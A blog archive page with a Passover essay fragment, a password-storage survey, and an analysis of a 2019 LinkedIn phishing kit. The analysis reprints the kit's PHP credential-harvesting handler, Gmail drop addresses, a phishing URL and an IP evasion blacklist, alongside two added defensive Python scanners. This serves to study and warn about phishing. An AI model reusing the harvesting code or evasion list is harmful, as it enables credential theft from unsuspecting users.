”And when the angel stretched out his hand toward Jerusalem to destroy it, G-d repented Him of the evil, and said to the angel that destroyed the people: ‘It is enough; now stay thy hand.’ And the angel of G-d was by the threshing-floor of Araunah the Jebusite.”

וַיִּשְׁלַח יָדוֹ הַמַּלְאָךְ יְרוּשָׁלִַם, לְשַׁחֲתָהּ, וַיִּנָּחֶם יְהוָה אֶל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית בָּעָם רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה הָיָה, עִם-גֹּרֶן האורנה (הָאֲרַוְנָה) הַיְבֻסִי

It is ironic, that the same ideas that the scripture fought so hard to invalidate are still as popular today as they were 3500 years ago. The prevalence of psychic readers on every street corner, Satanism in movies, literature, and popular culture just show you that regardless of how clear the instructions are, there is always a way to misinterpret them.

Death and Hollywood
Image 13: Satanic and demonic motifs in mainstream entertainment

Berkeley Psychics
Image 14: Distribution and density of Psychics, Tarots Card Readers, and Clairvoyant Mediums in Berkeley

All of this makes you wonder: what is it about these simple four self-explanatory statements that can possibly be confusing?

  1. “I will pass through the land of Egypt”, I and not an angel;
  2. ”And I will smite every first-born in the land of Egypt”, I and not a seraph;
  3. ”And I will carry out judgments against all the gods of Egypt”, I and not a messenger;
  4. ”I G-d”, and none other!

Happy Passover and Happy Easter. 

References

Special thanks to Dr. Alshech for his help with translating portions of the introduction to the Golden Haggadah.

He Smote the First Born of Egypt – Handel Israel In Egypt

Campin’ In Canaan’s Happy Land – Stanley Brothers Old Time Camp Meeting Album

I have left the land of bondage with its earthly treasures
I’ve journeyed to the place where there is love on every hand
I’ve exchanged the land of heartaches for the land of pleasure
I’m camping, I’m camping, in Canaan’s happy land

Every day I’m camping (camping) in the land of Canaan (Canaan)
And in rapture I survey its wondrous beauty grand (Oh, Glory)
Glory, hallelujah (I have) found the land of promise
(And I’m) camping, I’m camping, in Canaan’s happy land

Out of Egypt I have traveled through the darkness dreary
Far over hills and valleys and across the desert sands
Thoughts of land that’s safe and homeward I shall not go weary
I’m camping, I’m camping, in Canaan’s happy land

Yes I’ve reached the land of promise with the saints of glory
My journey ended in a place so lovely and so grand
I’ve been led by Jesus to this blessed land of story
I’m camping, I’m camping, in Canaan’s happy land

The Promised Land – Hymn 128 Sacred Harp Tunebook
128 The Promised Land

On Jordan’s stormy banks I stand,
And cast a wishful eye,
To Canaan’s fair and happy land,
Where my possessions lie.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

Oh, the transporting, rapt’rous scene,
That rises to my sight,
Sweet fields arrayed in living green,
And rivers of delight.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

Filled with delight, my raptured soul
Would here no longer stay!
Though Jordan’s waves around me roll,
Fearless I’d launch away.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

The Curse of Belial – Dead Scroll 394, 4Q2864Q287, fragment 6
Curse of Belial

(1) The Community Council shall say together in unison, ‘Amen. Amen.’ Then [they] shall curse Belial (2) and all his guilty lot, and they shall answer and say, ‘Cursed be [Be]lial in his devilish (Mastematic) scheme, (3) and damned be he in his guilty rule. Cursed be all the spir[its of] his Mot in their Evil scheme. (4) And may they be damned in the schemes of their [un]clean pollution. Surely [they are the to]t of Darkness. Their punishment (5) will be the eternal Pit. Amen. Amen. And cursed be the Evi[1] One [in all] of his dominions, and damned be (6) all the sons of Bel[ial] in all their times of service until their consummation [forever. Amen. Amen.’] (7) And [they are to repeat and say, ‘Cursed be you, Angel of the Pit and Spir[it of Destruction in al[1] the schemes of [your] gu[ilty] inclination, (8) [and in all the abominable [purposes] and counsel of [your] Wick[edness. And damned be you in [your] [sinful] d[omi]n[ion] (9) [and in your wicked and guilty rule,] together with all the abom[inations of She]ol and [the reproach of the P]it, (10) [and with the humiliations of destruction, with [no remnant and no forgiveness, in the fury of [God’s] wrath [for]ever [and ever.] Amen. A[men.] (11) [And cursed be al]1 who perform their [Evil schemes,] who establish your Evil purposes [in their hearts against] (12) Go[d’s Covenant,] so as to [reject the words of those who see] his [Tru]th, and exchange the Judge[ments of the Torah…]

Targum of Yonatan ben Uzziel (in Aramaic)
Targum (translation) Jonathan is a western targum of the Torah (Pentateuch) from the land of Israel as opposed to the eastern Babylonian Targum Onkelos (which was written by the nephew of the Roman emperor Titus). Its correct title was originally Targum Yerushalmi (Jerusalem Targum), which is how it was known in medieval times. But because of a printer’s mistake it was later labeled Targum Jonathan, in reference to Jonathan ben Uzziel. Some editions of the Pentateuch continue to call it Targum Jonathan to this day.

Most scholars refer to the text as Targum Pseudo-Jonathan. This targum also includes Aggadic material (non legal or narrative material, as parables, maxims, or anecdotes) collected from various sources as late as the Midrash Rabbah and the Talmud. It is a combination of a commentary and a translation. In the translation portions, it often agrees with the Targum Onkelos. The date of its composition is disputed. It cannot have been completed before the 633 CE Arabic conquest as it refers to Mohammad’s wife Fatimah, but might have been initially composed in the 4th Century CE. However, some scholars date it in the 14th Century (which would make this document contemporary with the Golden Haggadah). 

The Goddess Anath:Canaanite Epics of the Patriarchal Age – Umberto Cassuto

The Observer’s Book of Monsters – Gavin Lines
The Observer's Book of Monsters

Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The LinkedIn Real-time Messaging Phish of 2019

The LinkedIn Gangsters

A few days ago I received an invite from an old fintech colleague over the LinkedIn messaging service, the message read:

“Hi, I have attached a document for our new business financial proposal for your review. Access the proposal through the extension below and get back to me at your earliest convenience.

https://onedrive.live.com/?authkey=%21AFbNEI4K8RcVpmE&cid=EBDC72C570C985A5&id=EBDC72C570C985A5%21180&parId=root&o=OneUp

Coming from a 1st degree connection made this look like a legitimate communication. But I hadn’t been in touch with my friend for a while, nor had I discussed any business with him recently, so this seemed a bit odd.

I texted him back via LinkedIn to verify that he indeed sent it. To my surprise, he responded in real-time with a confirmation. When I asked him if it was intended for me, he again confirmed it via the messenger application (Image 1).

LinkedIn RT Message Phish
Image 1: LinkedIn texting session

By all phishing standards, this one takes the cake. The attacker was actually conducting his exploit in real-time using my colleague’s compromised LinkedIn account. This was alarming because (1) the relatively high degree of trust that exists between you and your 1st degree network opens the door to a wide range of trust based attacks and (2) the real-time text messaging helped validate that the person that I was talking to was indeed the sender.

I switched to a sandboxed machine, clicked on the link, and went down the rabbit hole…

LinkedIn Link to OneDrive PDF
Image 2: Link from texting session to a OneDrive hosted PDF with a secondary login required to “View Message Folder”

The link to the business proposal routed to a PDF file that was hosted on a publicly accessible Microsoft OneDrive folder (Image 2).

The PDF metadata indicated that it was created recently and dynamically using Office365 MS Word. The file name was based on my colleague’s LinkedIn profile and the subject of the proposal was also related to his line of work. The author name of the PDF document had the wishful name “Incoming Wire”.

LinkedIn Phish PDF Metadata
Image 3: The phishing PDF metadata

In order to “Continue reading your messages from OneDrive for Business”, I had to click on a second link titled “VIEW MESSAGE FOLDER”.  

The second link routed to the URL “https://normaav.ga/review”. This appeared to be a general access portal that aggregated different email systems and allowed the user to select their email provider of choice in order to view the “business proposal”.

LinkedIn Phish Login Portal
Image 4: The login portal loaded after clicking the PDF link

Clicking on the Office365 button option loaded a sign-in page and prompted me to enter my email address and the password for my Office365 account.

Normaav GA Office 365 Login
Image 5: The fake Office365 login page

Clicking on the other buttons resulted in the same functionality but with different email client login screens (Image 6).

LinkedIn Phish Logins
Image 6: Other email client login pages

The amount of detail built into the site was impressive. Where most phishing login pages deactivate superfluous links and features for efficiency reasons, this site was fully functional and even included the ability to reset your password, which came with a functional glyph generator and voice word reader.

Password Reset
Image 7: Sample password reset screen

Next, I checked the .GA domain for some clues. It came back as a Gabon based account, however, the details of the registrar had the following Netherlands address:

Domain name:NORMAAV.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

After a little more digging, I found that the same owner also registered several other phishing domains that included sites like:

Domain name:TECHGURUHELP.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

So, from the look of it, this phishing site was just an elaborate email address and password collection utility. It wasn’t used for malware distribution or payload delivery.

The Normaav.ga site was made up of several directories, each comprising PHP, HTML, image, Zip, and some JavaScript files. The zip file housed all of the executable and site code and also provided an additional layer of obfuscation from the anti-malware scanners that would be running on the hosting server.

Normaav GA File
Image 8: Sample content of the Normaav.ga website “file” directory

LinkedIn Phish Directory Content
Image 9: The content of the “assets” directory showing the images and icons used to create the fake login screens

As far as the mechanics of the user data collection, clicking the “Next” button on the email login screen executed the following post function:

if (isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] !== "" && $_POST['password'] !== "") {

        $date = date('l d F Y');
        $time = date('H:i');
        $user = $_POST['username'];
        $pass = $_POST['password'];
        $source = $_POST['from'];
        $ip = $_SERVER['REMOTE_ADDR'];
        $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
        $VictimInfo1 = "| Submitted by : " . $_SERVER['REMOTE_ADDR'] . " (" . gethostbyaddr($_SERVER['REMOTE_ADDR']) . ")";
        $VictimInfo2 = "| Location : " . $systemInfo['city'] . ", " . $systemInfo['region'] . ", " . $systemInfo['country'] . "";
        $VictimInfo3 = "| UserAgent : " . $systemInfo['useragent'] . "";
        $VictimInfo4 = "| Browser : " . $systemInfo['browser'] . "";
        $VictimInfo5 = "| Os : " . $systemInfo['os'] . "";
        $data = "
+ ————- Scampage ————–+
+ Account Details
| Username : $user
| Password : $pass
| Source: $source
+ ——————————————+
+ Victim Information
$VictimInfo1
$VictimInfo2
$VictimInfo3
$VictimInfo4
$VictimInfo5

| Received : $date @ $time
+ ——————————————+

It’s evident from the comments that the developer didn’t even bother anonymizing the variables; they just matter-of-factly named them “Victim Information”, “Victim1”, “Scampage”, etc. Apparently, in the scammer industry, ripping off people is just another dehumanized banal job, not much different than stuffing hot dogs into a box on a production line.

Phish Victims
Image 10: Phishing victims as hot dogs

The data upload logic was also rudimentary, without any fancy command and control features. Once all of the user information was collated, the content was simply posted to a “boxoffice794@gmail.com” email address. This Gmail account turned out to be just one of over 8134 emails used for data collection. The phishing site itself also came in a number of variations, with different versions utilizing one or more of the listed email addresses (see a few samples below).

Password Collection Email Addresses

adamandeve10000@gmail.com

emailresult1000cc@gmail.com

boxresult81@gmail.com

johnbeng95@gmail.com

tingyangting111@gmail.com

sharoncute48@gmail.com

mrtrqbing@gmail.com

chingy555@gmail.com

cleverin15@gmail.com

edu.logs1@gmail.com

Table 1: A sampling of 10 emails out of the 8134 used by the phishing sites.
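Because the kit shipped its PHP inside a zip file to stay out of sight of scanners on the hosting server, a hosting-side check has to open archives before it looks for harvesting code. The following is an added example, not part of the kit or the original post: a scanner that walks nested zip members and scores PHP files on the markers visible in the excerpt above. The indicator weights, the threshold, and the file names in the constructed sample archive are assumptions.

```python
import io
import re
import zipfile

# Markers visible in the excerpt quoted above; weights and threshold are assumptions.
INDICATORS = {
    "reads_password_field": (re.compile(r"""\$_POST\[\s*['"]password['"]\s*\]"""), 2),
    "reads_client_ip": (re.compile(r"""\$_SERVER\[\s*['"]REMOTE_ADDR['"]\s*\]"""), 1),
    "victim_variable": (re.compile(r"\$VictimInfo\d+"), 3),
    "scampage_banner": (re.compile(r"Scampage", re.I), 3),
}
THRESHOLD = 5          # a plain login handler (password + client IP) scores 3 and passes
SCRIPT_SUFFIXES = (".php", ".phtml", ".inc")


def score_source(text):
    """Return (score, names of the indicators found) for one script's source."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits


def scan_zip(data, label, depth=0, max_depth=2, max_member=2_000_000):
    """Scan zip bytes, recursing into nested zips; return [(path, score, hits)]."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with archive:
        for info in archive.infolist():
            path = f"{label}!{info.filename}"
            # Skip directories and oversized members (guards against zip bombs).
            if info.is_dir() or info.file_size > max_member:
                continue
            try:
                body = archive.read(info)
            except (RuntimeError, zipfile.BadZipFile):
                # Encrypted or corrupt member: report it, since it cannot be inspected.
                findings.append((path, 0, ["unreadable_member"]))
                continue
            lower = info.filename.lower()
            if lower.endswith(".zip") and depth < max_depth:
                findings += scan_zip(body, path, depth + 1, max_depth, max_member)
            elif lower.endswith(SCRIPT_SUFFIXES):
                score, hits = score_source(body.decode("utf-8", "replace"))
                if score >= THRESHOLD:
                    findings.append((path, score, hits))
    return findings


def build_sample():
    """Constructed test archive: a harmless form handler plus a nested zip
    whose script carries the markers from the quoted excerpt (inert text)."""
    harvest = (
        "<?php\n"
        "$user = $_POST['username'];\n"
        "$pass = $_POST['password'];\n"
        "$VictimInfo1 = '| Submitted by : ' . $_SERVER['REMOTE_ADDR'];\n"
        "// + ---- Scampage ---- +\n"
    )
    contact = "<?php $name = $_POST['name']; echo 'thanks'; ?>\n"
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("file/next.php", harvest)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("site/contact.php", contact)
        z.writestr("site/office.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for path, score, hits in scan_zip(build_sample(), "upload.zip"):
        print(score, path, ", ".join(hits))
```
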

From a linguistic/semantic point of view, the creator of the site and the email accounts is most likely a native American English speaker who pays close attention to detail. The verbiage on the site has no spelling or major grammar issues. The composite names used in the email accounts demonstrate clever wordplay and use of contemporary idioms. The word generation algorithm also takes into account human readable combinations such as:

sql-injection
alibaba-reloaded
blood-money
call-me-ghost
extremely-blessed-007

Another interesting observation about the code is that it utilizes defensive strategies and countermeasures. For example, it uses a blacklist of IP addresses to stop the data uploader from running on high-risk networks (like Fortinet, Kaspersky, AVG Technologies, etc.) where this activity would most likely be quickly detected and stopped. So in essence, this is a signature-based form of reverse malware protection.

# _blacklist.dat  — contains address ranges to always be blocked.
#   Only IPv4 addressing is supported.
#
#   legal range formats are:
#
#   255.255.255.255                             Single address
#   255.255.255.255/16                       CIDR Mask
#   255.255.255.255/255.255.0.0       address w/mask
#   255.255.*.*                                        wildcards
#   255.255.255.0-255.255.255.255   low to high address
#
#   Comments may be added to a line starting with ‘#’ character
#   and inline comments may be added starting with ‘#’ character.
#


#  TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

 

#  AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255

Table 2: Extract from the blacklist used by the application in order to avoid high risk networks
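The range formats listed in the file header are enough to work out, for a recovered kit, which of your own scanner or sandbox egress addresses it will refuse to run for, and therefore where analysis will under-report. The parser below is an added example, not code from the kit or the original post; the function names are hypothetical, and the sample mixes ranges from the excerpt above with constructed lines (documentation addresses) that exercise the remaining formats.

```python
import ipaddress


def _ip(text):
    """Dotted-quad IPv4 string to a 32-bit integer (raises ValueError if invalid)."""
    return int(ipaddress.IPv4Address(text.strip()))


def parse_entry(entry):
    """Convert one blacklist entry to an inclusive (low, high) integer pair."""
    entry = entry.strip()
    if "-" in entry:                                  # low to high address
        low, high = (_ip(part) for part in entry.split("-", 1))
        if low > high:
            raise ValueError(f"range is reversed: {entry}")
        return low, high
    if "*" in entry:                                  # wildcards
        octets = entry.split(".")
        first_star = octets.index("*")
        # Only trailing wildcards describe one contiguous range.
        if len(octets) != 4 or any(o != "*" for o in octets[first_star:]):
            raise ValueError(f"wildcards must be trailing octets: {entry}")
        low = ".".join("0" if o == "*" else o for o in octets)
        high = ".".join("255" if o == "*" else o for o in octets)
        return _ip(low), _ip(high)
    if "/" in entry:                                  # CIDR mask or address w/mask
        # strict=False: the header's own examples carry host bits (255.255.255.255/16).
        net = ipaddress.IPv4Network(entry, strict=False)
        return int(net.network_address), int(net.broadcast_address)
    value = _ip(entry)                                # single address
    return value, value


def parse_blacklist(text):
    """Return (entries, rejected): entries are (low, high, raw) tuples."""
    entries, rejected = [], []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip()         # drop full-line and inline comments
        if not entry:
            continue
        try:
            low, high = parse_entry(entry)
        except ValueError:
            rejected.append(entry)
        else:
            entries.append((low, high, entry))
    return entries, rejected


def covering_entries(address, entries):
    """Raw blacklist entries that contain the given address."""
    value = _ip(address)
    return [raw for low, high, raw in entries if low <= value <= high]


SAMPLE = """\
#  TOR SERVERS IP RANGES            (ranges copied from the excerpt above)
96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
#  AMAZON IP RANGES
54.219.0.0-54.219.255.255
107.20.0.0-107.23.255.255
#  Constructed lines for the other documented formats
192.0.2.10                  # single address
198.51.100.77/24            # CIDR mask with host bits set
203.0.113.5/255.255.255.0   # address w/mask
10.20.*.*                   # wildcards
10.*.3.4                    # constructed malformed line
"""

if __name__ == "__main__":
    entries, rejected = parse_blacklist(SAMPLE)
    # Constructed analysis vantage points: which ones would the kit skip?
    for name, addr in {"cloud-sandbox": "107.22.14.9", "office-proxy": "192.0.2.11"}.items():
        print(name, addr, covering_entries(addr, entries) or "not listed")
    print("rejected lines:", rejected)
```
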

It’s noteworthy that several of the PHP functions (see sample below) contain a reference to “MADEMEN CYBER TEAM”. The code also contains references to a specific developer who is using the alias “Sage The Hurt Ice”; this name is also associated with an active PayPal account called “payp algent” and “paya_ldirect”.

Paypa_ldirect
Image 11: The author “SAGE THE HURT ICE”

 <TABLE>
    <tr><td>________MADEMEN CYBER TEAM_________</td></tr>
    <tr><td><STRONG>$domain I.D: $login<td/></tr>
    <tr><td><STRONG>Password: $passwd</td></tr>
    <tr><td><STRONG>IP: $ip</td></tr>
    <tr><td><STRONG>Date: $server</td></tr>
    <tr><td><STRONG>country : $country</td></tr>
    <tr><td>Browser : $browserAgent</td></tr>
    <tr><td>____HACKED BY SAGE THE HURT ICE (SKYPE =PAYP ALGENT)____</td></tr>
    </BODY>

What makes this exploit so potent is that the operation combines machine generated content, a large degree of automation, and the creation of near real-time customized payloads that are based on LinkedIn account user data. Just like with a traditional mail merge operation where the customization of each letter is done by pulling content from different databases, the same takes place here, with the slight variation that the database is the user’s LinkedIn profile and the ‘mail to’ is his entire LinkedIn network.

With all of these dynamic orchestration capabilities, the cherry on the cake is that there was also a human in the loop who chatted with the target in real-time in order to confirm the authenticity of the phish.

This exploit should be a major concern for LinkedIn and its users. In 2016, LinkedIn lost 117 million user accounts (they were hacked as early as 2012 but didn’t discover it until 2016). Many of these passwords have not been changed by the users, who are still unaware of the breach. This means that the perpetrators of the current phishing expedition are essentially shooting fish in a barrel.

Based on the Normaav.ga site uptime of 4 days (before it was flagged as “deceptive” by the search engines), the volume of recovered passwords, and the number of concurrent phishing campaigns (about 10K), a conservative estimate for this campaign’s yield is over 100K new breached accounts.

So what can you do to avoid getting your LinkedIn account hacked? Obviously, don’t click on any links sent to you via the messenger. You should stop reusing the same password for multiple accounts and make it more complex. You should also consider using a password management system. In the long run though, your best bet is to enable two factor authentication (using your phone) for all of your accounts. Most ecommerce sites like Amazon, PayPal, and email providers already offer this as a free service and activating it is just a simple two step process.

Notes
Soon after detecting the exploit, I notified LinkedIn about the details of the breach. It took LinkedIn more than 48 hours to reply. The response I got was “We have provided this information to the correct team to review further and act based on their results.”  I haven’t heard back from them since. I have also followed up with several of the victims, who were completely unaware that someone took over their LinkedIn account and was using it to mount a phishing expedition.

If you haven’t done this for a while, it may also behoove you to log in to your LinkedIn and other social media accounts just to make sure that they are still accessible.

References
2019 State of the Phish Report (page 11-19 cover estimated recovery rates) – Proofpoint.com
The complete phishing kit  (source code and files)
The phishing email addresses directory (where the stolen credentials are sent after harvesting)
LinkedIn Breach Exposed 117 Million User Accounts – eSecurity Planet
Facebook stored 200-600 millions of Instagram passwords in plain text – IT ProPortal
Password Safe – A free and open source password management system

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The Great Password Storage Survey

Find Milton's Password

The idea for the password survey came about more than fifteen years ago when I managed a security team in a large Fortune 500 organization. While designing a new fraud detection platform, we discovered that a significant number of previous security incidents were attributed to compromised user passwords and credentials. The data suggested that this problem affected all business divisions and departments across the company and our partners. After a successful campaign to launch a corporate-wide root cause initiative, we ran a pilot that examined the password storage and retrieval practices in one of our regional offices with about 900 employees. After concluding the initial survey, we expanded the sampling to three other corporate locations.

The results of the first survey were supplemented by data I collected a few years later while working for a managed security service company that provided hosted proxy, firewall, IDS, and anti-malware service to several hundred credit unions and community banks. The focus of the second survey was on small to medium size U.S. based financial institutions.[1]

The total population examined in the study was about 3700 accounts and individuals. The corporate units included development, IT administration, business groups, and general staff. The sampled data reflects a typical cross-section of large (20K-40K) and small to medium (20-750) sized organizations and represents a historical snapshot of password practices in a typical regulated financial service company circa 2003-2010.

4-Password found by unit

Chart 1: Password found by business unit

Background
Knowledge-based authentication that utilizes passwords is different from other access control methods because it promotes the idea that by increasing the password entropy we can resist and discourage a brute force password recovery attack.

For many security practitioners this seems like a panacea. Policies calling for additional password complexity appear attractive at first, but their practical enforcement on a multi-platform, enterprise scale is difficult to implement.

This is especially the case when we prohibit users from writing their passwords down or reusing them. The user’s inability to manage numerous complex and frequently expiring passwords can eventually compromise even the most secure environments that support multi-tiered firewalls and utilize the most advanced IDS, and robust VPN connectivity.

Paradoxically, it seems that when it comes to passwords, the user is caught between a rock and a hard place; the more secure the password is, the less so is the user.

Heterogeneous Environments and a Glut of Passwords
The never ending cycle of M&A continues to create heterogeneous platforms within the enterprise. This phenomenon results in the proliferation of systems with different rules for password lifecycles, login procedures, and authentication standards. The impact on the users has been overwhelming as they need to deal with an ever increasing number of login challenges.

Even in well consolidated enterprises that utilize state of the art Active Directory and Single Sign-On, there are a handful of work issued standalone devices and online accounts that are not tied to the central login infrastructure. Even in these integrated environments, the expiration of individual passwords is rarely synchronized, often causing a cascade of resets on other systems with user lockouts and loss of productivity.

To further complicate this, all employees also maintain dozens of non work-related passwords that they use during their work day. This significantly increases their cognitive burden, so in an effort to conserve energy, some resort to consolidating their private and work passwords into a single file. The survey suggests that if we tally the work and private accounts, the average number of user passwords each person has can exceed 60 (Chart 2).

The number of work related accounts varied with the user’s corporate responsibility (Chart 3), but on average, each had between 10-20 passwords.

1-Average number of passwords per user
Chart 2: Average number of passwords per user

Information Overload
The human factor plays a significant role in the challenge of creating, storing, and retrieving complex passwords. A number of psychological experiments have demonstrated that subjects are able to repeat accurately around eight meaningful combinations of letters, numbers, and words.[2]

When a user is given several random passwords that are eight characters long, most will remember only one. If a user is required to remember two or more such passwords, he or she will likely resort to writing them down.

When asked how many IDs and passwords they had to keep track of, the users’ immediate answer was “way too many!” The majority of users also stated that it was bad enough when they only needed a handful of passwords to access e-mail, the network and mainframe accounts. But now, every internal and external application required a complex password.

2-Average number of passwords per user type
Chart 3: Average number of passwords per user type

3-Reason for writing passwords down

Chart 4: Reasons for writing passwords down

So how did the users resolve the problem of maintaining dozens of strong passwords? When pressed, most admitted—as the research suggested—that they resorted to keeping a written list or that they have been using the same password or a variant of it for multiple systems. 

On the record, administrative staff denied that they followed this practice but off the record they admitted that they were powerless to stop it and that they themselves were guilty of these same offenses. Other industry sources suggest that this is indeed a widespread phenomenon.[3]

When questioned about their memorization techniques (the policy requires that passwords be memorized), many of them indicated that utilizing mnemonics, backronym, and other techniques were tiresome and this resulted in forgetfulness, mistakes, and system lockouts. 

The majority of users (75%) stated that they could not memorize complex passwords and when they attempted to achieve this in the past it always resulted in password resets. It is interesting to note that as much as 10% of the users felt that the high frequency of the password expiration did not warrant the investment in memorizing it. Another 10% of the users felt that actually writing the password down made them more productive.

5-Password issued vs. password memorized
Chart 5: Password issued vs. password memorized

Password Storage Strategies
The password searches identified the existence of two types of password storage strategies. The first group (1) which consisted of 27% of the recovered passwords was made-up of data that was either handwritten or printed and stored in the user’s immediate work area. 

The written documents included artifacts such as post-it notes, legal pads, notebooks, and text on dry erase board. The second category (2) consisted of 73% of the recovered passwords found on electronic storage in the form of digital files on portable storage devices, PDAs, phones, hard drives, and network shares.

7-Password hiding locations
Chart 6: Password storage areas

The large percentage of electronically stored passwords suggests that users are somewhat security conscious and that they do look for the middle ground between the two evils of keeping passwords out in the open and memorizing them.

The high rate of spreadsheet utilization (35%) for password storage suggests that without a proper company sponsored tool for managing passwords like a password safe, users will instinctively gravitate toward the next ‘best’ technology available in-house.

Password Hangouts
The majority (5% each) of users hid passwords either under a mouse pad or on sticky notes that were kept in a book or folder somewhere in the user’s immediate work area. The total percentage of passwords hidden ‘under’ various items (Table 1) was 27%.

| Password Locations Office Work Area | # Found | % of Total |
|---|---|---|
| Under mouse pad, stapler, or tape dispenser | 174 | 5% |
| Under keyboard | 86 | 2% |
| Under desk calendar | 77 | 2% |
| Under flower pot | 32 | 1% |
| Under garbage can | 11 | 0.3% |
| Under printer | 29 | 1% |
| Under phone or phone reference card | 51 | 1% |
| Under carpet or mat | 7 | 0.2% |
| Under bookshelf | 38 | 1% |
| Under paper tray | 30 | 1% |
| Under or on whiteboard or clipboard | 61 | 2% |
| Under trivet, coaster, paper weight, or pencil holder | 18 | 0.5% |
| Interior door of coat cabinet | 18 | 0.5% |
| Sticky note on the monitor | 40 | 1% |
| Note inside a book or wallet | 180 | 5% |
| Note in music CD box | 67 | 2% |
| On whiteboard obfuscated using letter or number padding | 72 | 2% |
| Total | 1058 | 27% |

Table 1: Hidden password locations – Office work area

 

| Password Locations on Electronic Storage | # Found | % of Total |
|---|---|---|
| On floppy disk inserted in drive | 15 | 0.4% |
| On USB, flash drive, or other device | 80 | 2% |
| Protected spreadsheet on a password protected network share | 613 | 17% |
| MS Access database on a network share | 216 | 6% |
| Spreadsheet on a network share | 620 | 17% |
| Text file located on a network share | 281 | 8% |
| e-mail file (user would create and e-mail himself the new password) | 408 | 11% |
| MS Word document | 103 | 3% |
| File stored on an Intranet web site | 300 | 8% |
| File stored on an Internet web site | 26 | 1% |
| Total | 2662 | 73% |

Table 2: Hidden password locations – Electronic storage

 

The majority (73%) of the hidden passwords were kept on electronic storage (spreadsheets, documents, and e-mails) on a variety of locations, the most common being (1) 34% on network drive, and (2) 11% on the e-mail server (Table 2).  

Only 1% of the users openly placed the latest password on their monitor (Figure 1). It is interesting to note the password generation algorithm used. The first password on the list (which was complex) was used as the seed for all future password permutations. Each time the system required a new password, the user wrote the new one down and erased the previous one.

Whenever the system permitted the re-use of old passwords, we found a high degree of password recycling via password variances and sequential use. This included 62% of developers, 86% of administrators, 97% of business users, and 94% of admin and facility staff.  


Figure 1: User passwords written on a sticky note

 

Is there a Method in the madness?
75% of the users interviewed cited poor memory as the main reason (1) for writing down and hiding passwords. The second (2) reason cited was the unspoken legitimacy of this practice and its widespread use. The third (3) reason was that the password was shared by several users, so having it written in a central location was the most convenient way to synchronize it and keep all users informed of any changes. This was primarily the case amongst DBAs, system administrators, and developers (87% combined). The majority of interviewees also acknowledged that they were aware of existing security policy that clearly discouraged such practices.

From conversations with administrative staff, ignorance of the law was not a factor in writing down passwords (Chart 7). Over 90% of the admins acknowledged that they knew that writing their system password down was against policy and information security directives, but they did it because they were located in a physically “secure area” that had strict access control roles, and they considered it a calculated risk.

Chart 7: Percent of administrators told not to write down passwords

An interesting usage relationship shows that systems which periodically require users to change passwords actually trigger more people to ‘hide’ them in written form near their workstations. We estimated that the likelihood of finding written passwords near a workstation subjected to frequent password changes was 35% to 55%. At the same sites, the likelihood was only 10% to 20% for workstations connected to systems that did not enforce frequent password changes.

In many cases, over a third of the users created sequential passwords (Chart 8) such as changing Pa$$w0rd_1 to Pa$$w0rd_2. The stats for administrative users show that this practice was higher than 80% when permitted by the system. This information is again confirmed by other studies that show the user’s tendency to avoid constantly memorizing new, complex passwords and to write them down instead.[4]


Chart 8: Used sequential passwords

Social Factors that Contribute to Password Mismanagement
Password security relies on the premise that passwords are kept secret at all times. This is not a trivial requirement because in a typical password life cycle, there are many opportunities for compromise whenever a password is created, used, transmitted, or stored. Passwords are always vulnerable to compromise because:

  1. They need to be initially created and assigned to a user
  2. They need to be transmitted
  3. They need to be changed
  4. They need to be stored and retrieved

In this context, sharing passwords among a group of users completely negates the requirement to keep them secret. When we asked the users about the practice of sharing passwords, the unanimous response was that this was a common practice exercised by all. In fact, the system and database administration and InfoSec teams, which should have led the charge in fighting this phenomenon, were the largest practitioners of group password sharing (Charts 9-10).

Chart 9: Password sharing among administrators

Chart 10: Password sharing among developers

This contradictory situation raised several questions. When we asked the users about the clearly prohibited practice of password sharing they provided the following rationale:

  1. Friendliness––Users try to avoid behavior that would put them in a negative social light. Individuals who strictly protect their passwords by steadfastly refusing to write them down or share them with colleagues can be seen as anti-social.
  2. Conformity––Due to strong emphasis placed on “being a team player” and the importance of collaboration, many individuals determine that conformity is important and work hard to be sure that others see them as easygoing and trustworthy. For example, if a system administrator (an authority figure) asks a user for his log-in password, he is likely to reveal it because he doesn’t wish to seem suspicious of an authority figure.
  3. Trust––Sharing passwords between team members can be seen as a sign of collegial affiliation. If a user refuses to share a password with a co-worker, especially where such practice is commonplace, it could be seen as a sign of distrust.
  4. Unwritten work procedures––A team of co-workers will develop ‘informal’ procedures and workarounds to deal with occasional situations that impact their productivity (sharing workstations, using each other’s e-mail program, etc). Some of these workarounds may contradict official policies. Users who follow such informal procedures are normally acting in good faith; they are trying to be helpful and practical in an effort to get the job done.
  5. Responsibility––Users are aware of password policies, but continue to violate them nevertheless because they do not expect to be held accountable for breaking the rules, because “everyone” regards the regulations as unrealistic.
